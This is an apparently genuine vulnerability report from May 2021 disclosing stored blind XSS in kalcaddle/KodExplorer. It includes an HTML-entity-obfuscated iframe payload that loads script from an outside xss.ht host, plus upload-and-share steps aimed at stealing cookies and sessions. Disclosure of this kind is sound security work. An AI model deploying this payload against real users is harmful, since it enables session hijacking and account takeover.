Cross-site Scripting (XSS) - Stored in kalcaddle/KodExplorer

Valid
Reported on May 19th 2021

✍️ Description

This product is vulnerable to Blind XSS via adding Blind XSS iframe payload in a Markdown file and adding in to the KodExplorer.

🕵️‍♂️ Proof of Concept

"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;b3efxss.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
  • Add the payload in to a Markdown file.[craft your own]
  • Upload it to the KodExplorer.
  • view it , XSS will be triggered.
  • To increase attack area share he file to other KodExplorer Users ,XSS will be triggered while viewing the file which leaks their Cookies and sessions leading to account takeover bugs.

💥 Impact

steal session, Cookies, account takeover.